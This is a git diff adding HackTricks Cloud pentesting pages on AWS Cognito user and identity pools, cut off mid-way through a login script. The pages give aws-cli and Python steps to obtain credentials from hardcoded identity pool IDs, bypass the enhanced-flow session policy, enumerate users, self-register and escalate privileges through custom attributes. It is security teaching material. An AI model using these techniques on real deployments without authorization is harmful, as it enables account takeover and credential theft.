+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-codebuild-post-exploitation/" %}
+[aws-codebuild-post-exploitation](../aws-post-exploitation/aws-codebuild-post-exploitation/)
+{% endcontent-ref %}
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md" %}
+[aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
new file mode 100644
index 0000000000..1701910c0d
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
@@ -0,0 +1,130 @@
+# AWS - Cognito Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cognito
+
+Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple.
+
+Central to Amazon Cognito are two primary components:
+
+1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**.
+2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication.
+
+### **User pools**
+
+To learn what is a **Cognito User Pool check**:
+
+{% content-ref url="cognito-user-pools.md" %}
+[cognito-user-pools.md](cognito-user-pools.md)
+{% endcontent-ref %}
+
+### **Identity pools**
+
+The learn what is a **Cognito Identity Pool check**:
+
+{% content-ref url="cognito-identity-pools.md" %}
+[cognito-identity-pools.md](cognito-identity-pools.md)
+{% endcontent-ref %}
+
+## Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List Identity Pools
+aws cognito-identity list-identity-pools --max-results 60
+aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
+aws cognito-identity list-identities --identity-pool-id <ident-pool-id> --max-results 60
+aws cognito-identity get-identity-pool-roles --identity-pool-id <ident-pool-id>
+
+# Identities Datasets
+## Get dataset of identity id (inside identity pool)
+aws cognito-sync list-datasets --identity-pool-id <ident-pool-id> --identity-id <ident-id>
+## Get info of the dataset
+aws cognito-sync describe-dataset --identity-pool-id <value> --identity-id <value> --dataset-name <value>
+## Get dataset records
+aws cognito-sync list-records --identity-pool-id <value> --identity-id <value> --dataset-name <value>
+
+# User Pools
+## Get pools
+aws cognito-idp list-user-pools --max-results 60
+
+## Get users
+aws cognito-idp list-users --user-pool-id <user-pool-id>
+
+## Get groups
+aws cognito-idp list-groups --user-pool-id <user-pool-id>
+
+## Get users in a group
+aws cognito-idp list-users-in-group --user-pool-id <user-pool-id> --group-name <group-name>
+
+## List App IDs of a user pool
+aws cognito-idp list-user-pool-clients --user-pool-id <user-pool-id>
+
+## List configured identity providers for a user pool
+aws cognito-idp list-identity-providers --user-pool-id <user-pool-id>
+
+## List user import jobs
+aws cognito-idp list-user-import-jobs --user-pool-id <user-pool-id> --max-results 60
+
+## Get MFA config of a user pool
+aws cognito-idp get-user-pool-mfa-config --user-pool-id <user-pool-id>
+
+## Get risk configuration
+aws cognito-idp describe-risk-configuration --user-pool-id <user-pool-id>
+```
+{% endcode %}
+
+### Identity Pools - Unauthenticated Enumeration
+
+Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles).
+
+### User Pools - Unauthenticated Enumeration
+
+Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.**
+
+## Privesc
+
+{% content-ref url="../../aws-privilege-escalation/aws-cognito-privesc.md" %}
+[aws-cognito-privesc.md](../../aws-privilege-escalation/aws-cognito-privesc.md)
+{% endcontent-ref %}
+
+## Unauthenticated Access
+
+{% content-ref url="../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md" %}
+[aws-cognito-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+## Persistence
+
+{% content-ref url="../../aws-persistence/aws-cognito-persistence.md" %}
+[aws-cognito-persistence.md](../../aws-persistence/aws-cognito-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
new file mode 100644
index 0000000000..0ed8cb0223
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
@@ -0,0 +1,225 @@
+# Cognito Identity Pools
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include:
+
+* Amazon Cognito user pools
+* Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple
+* Providers compliant with OpenID Connect (OIDC)
+* SAML (Security Assertion Markup Language) identity providers
+* Developer authenticated identities
+
+```python
+# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
+import boto3
+
+# Initialize the Amazon Cognito Identity client
+client = boto3.client('cognito-identity')
+
+# Assume you have already created an identity pool and obtained the IdentityPoolId
+identity_pool_id = 'your-identity-pool-id'
+
+# Add an identity provider to the identity pool
+response = client.set_identity_pool_roles(
+    IdentityPoolId=identity_pool_id,
+    Roles={
+        'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
+        'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
+    }
+)
+
+# Print the response from AWS
+print(response)
+```
+
+### Cognito Sync
+
+To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs.
+
+This is **useful to keep information of a user** (who will be always using the same Identity ID).
+
+Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...).
+
+### Tools for pentesting
+
+* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+
+For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+
+#### Usage
+
+Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+
+```bash
+Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools 
+us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 
+59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
+```
+
+Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
+
+```bash
+Pacu (new:test) > run cognito__enum
+```
+
+* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation.
+
+#### Installation
+
+```bash
+$ pip install cognito-scanner
+```
+
+#### Usage
+
+```bash
+$ cognito-scanner --help
+```
+
+For more information check https://github.com/padok-team/cognito-scanner
+
+## Accessing IAM Roles
+
+### Unauthenticated
+
+The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable).
+
+{% hint style="success" %}
+The **IAM Cognito unathenticated role created via is called** by default `Cognito_<Identity Pool name>Unauth_Role`
+{% endhint %}
+
+If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with:
+
+```python
+import requests
+
+region = "us-east-1"
+id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
+url = f'https://cognito-identity.{region}.amazonaws.com/'
+headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
+params = {'IdentityPoolId': id_pool_id}
+
+r = requests.post(url, json=params, headers=headers)
+json_resp = r.json()
+
+if not "IdentityId" in json_resp:
+    print(f"Not valid id: {id_pool_id}")
+    exit
+
+IdentityId = r.json()["IdentityId"]
+
+params = {'IdentityId': IdentityId}
+
+headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
+r = requests.post(url, json=params, headers=headers)
+
+print(r.json())
+```
+
+Or you could use the following **aws cli commands**:
+
+```bash
+aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
+aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign
+```
+
+{% hint style="warning" %}
+Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section.
+{% endhint %}
+
+### Enhanced vs Basic Authentication flow
+
+The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/#session-policies) to the IAM role session generated. This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services).
+
+However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**.
+
+{% code overflow="wrap" %}
+```bash
+# Get auth ID
+aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
+
+# Get login token
+aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign
+
+# Use login token to get IAM session creds
+## If you don't know the role_arn use the previous enhanced flow to get it
+aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign
+```
+{% endcode %}
+
+{% hint style="warning" %}
+If you receive this **error**, it's because the **basic flow is not enabled (default)**
+
+`An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.`
+{% endhint %}
+
+Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/).
+
+### Authenticated
+
+{% hint style="info" %}
+Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials.
+{% endhint %}
+
+There could also be **roles** available for **authenticated users accessing the Identity Poo**l.
+
+For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**.
+
+{% hint style="success" %}
+The **IAM Cognito athenticated role created via is called** by default `Cognito_<Identity Pool name>Auth_Role`
+{% endhint %}
+
+Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured).
+
+<pre class="language-bash"><code class="lang-bash">aws cognito-identity get-id \
+    --identity-pool-id &#x3C;identity_pool_id> \
+    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+
+# Get the identity_id from the previous commnad response
+aws cognito-identity get-credentials-for-identity \
+    --identity-id &#x3C;identity_id> \
+    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+
+
+# In the IdToken you can find roles a user has access because of User Pool Groups
+# User the --custom-role-arn to get credentials to a specific role
+aws cognito-identity get-credentials-for-identity \
+    --identity-id &#x3C;identity_id> \
+<strong>    --custom-role-arn &#x3C;role_arn> \
+</strong>    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+</code></pre>
+
+{% hint style="warning" %}
+It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
new file mode 100644
index 0000000000..d0229cf860
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
@@ -0,0 +1,529 @@
+# Cognito User Pools
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
+
+User pools provide:
+
+* Sign-up and sign-in services.
+* A built-in, customizable web UI to sign in users.
+* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool.
+* User directory management and user profiles.
+* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
+* Customized workflows and user migration through AWS Lambda triggers.
+
+**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool.
+
+### Potential attacks
+
+* **Registration**: By default a user can register himself, so he could create a user for himself.
+* **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack.
+* **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**.
+
+### Tools for pentesting
+
+* [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\
+  For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+
+```bash
+# Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account
+Pacu (new:test) > run cognito__enum
+
+# cognito__attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools 
+us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 
+59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
+```
+
+* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info.
+
+```bash
+# Install
+pip install cognito-scanner
+# Run
+cognito-scanner --help
+```
+
+* [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users.
+
+```bash
+python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl 
+```
+
+## Registration
+
+User Pools allows by **default** to **register new users**.
+
+```bash
+aws cognito-idp sign-up --client-id <client-id> \
+    --username <username> --password <password> \
+    --region <region> --no-sign-request
+```
+
+#### If anyone can register
+
+You might find an error indicating you that you need to **provide more details** of abut the user:
+
+```
+An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required
+```
+
+You can provide the needed details with a JSON such as:
+
+```json
+--user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]'
+```
+
+You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name:
+
+```
+An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists
+```
+
+{% hint style="info" %}
+Note in the previous command how the **custom attributes start with "custom:"**.\
+Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**.
+{% endhint %}
+
+Or just to test if a client id exists. This is the error if the client-id doesn't exist:
+
+```
+An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist.
+```
+
+#### If only admin can register users
+
+You will find this error and you own't be able to register or enumerate users:
+
+```
+An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool
+```
+
+### Verifying Registration
+
+Cognito allows to **verify a new user by verifying his email or phone number**. Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this:
+
+```bash
+aws cognito-idp confirm-sign-up --client-id <cliet_id> \
+    --username aasdasd2 --confirmation-code <conf_code> \
+    --no-sign-request --region us-east-1
+```
+
+{% hint style="warning" %}
+Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**.
+{% endhint %}
+
+### Privilege Escalation / Updating Attributes
+
+By default a user can **modify the value of his attributes** with something like:
+
+```bash
+aws cognito-idp update-user-attributes \
+    --region us-east-1 --no-sign-request \
+    --user-attributes Name=address,Value=street \
+    --access-token <access token>
+```
+
+#### Custom attribute privesc
+
+{% hint style="danger" %}
+You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself!
+{% endhint %}
+
+#### Email/username modification privesc
+
+You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again).
+
+{% hint style="warning" %}
+You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\
+Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**.
+
+Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**.
+{% endhint %}
+
+Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**:
+
+```bash
+aws cognito-idp verify-user-attribute \
+    --access-token <access_token> \
+    --attribute-name email --code <code> \
+    --region <region> --no-sign-request
+```
+
+Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**.
+
+{% hint style="info" %}
+The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred\_username already being used** to impersonate a different user.
+{% endhint %}
+
+### Recover/Change Password
+
+It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there:
+
+```bash
+aws cognito-idp forgot-password \
+    --client-id <client_id> \
+    --username <username/email/phone> --region <region>
+```
+
+{% hint style="info" %}
+The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users
+{% endhint %}
+
+With the code you can change the password with:
+
+```bash
+aws cognito-idp confirm-forgot-password \
+    --client-id <client_id> \
+    --username <username> \
+    --confirmation-code <conf_code> \
+    --password <pwd> --region <region>
+```
+
+To change the password you need to **know the previous password**:
+
+```bash
+aws cognito-idp change-password \
+    --previous-password <value> \
+    --proposed-password <value> \
+    --access-token <value>
+```
+
+## Authentication
+
+A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\
+Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**.
+
+* [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications.
+  * The ID Token is the token that **contains the attributes values of the user**, even the custom ones.
+* [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes.
+* [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**.
+
+### ADMIN\_NO\_SRP\_AUTH & ADMIN\_USER\_PASSWORD\_AUTH
+
+This is the server side authentication flow:
+
+* The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters.
+* After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials.
+
+This **method is NOT enabled** by default.
+
+To **login** you **need** to know:
+
+* user pool id
+* client id
+* username
+* password
+* client secret (only if the app is configured to use a secret)
+
+{% hint style="info" %}
+In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\
+Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**
+{% endhint %}
+
+```python
+aws cognito-idp admin-initiate-auth \
+    --client-id <client-id> \
+    --auth-flow ADMIN_USER_PASSWORD_AUTH \
+    --region <region> \
+    --auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
+    --user-pool-id "<pool-id>"
+
+# Check the python code to learn how to generate the hsecret_hash
+```
+
+<details>
+
+<summary>Code to Login</summary>
+
+```python
+import boto3
+import botocore
+import hmac
+import hashlib
+import base64
+
+
+client_id = "<client-id>"
+user_pool_id = "<user-pool-id>"
+client_secret = "<client-secret>"
+username = "<username>"
+password = "<pwd>"
+
+boto_client = boto3.client('cognito-idp', region_name='us-east-1')
+
+def get_secret_hash(username, client_id, client_secret):
+    key = bytes(client_secret, 'utf-8')
+    message = bytes(f'{username}{client_id}', 'utf-8')
+    return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
+
+# If the Client App isn't configured to use a secret
+## just delete the line setting the SECRET_HASH
+def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
+    try:
+        return boto_client.admin_initiate_auth(
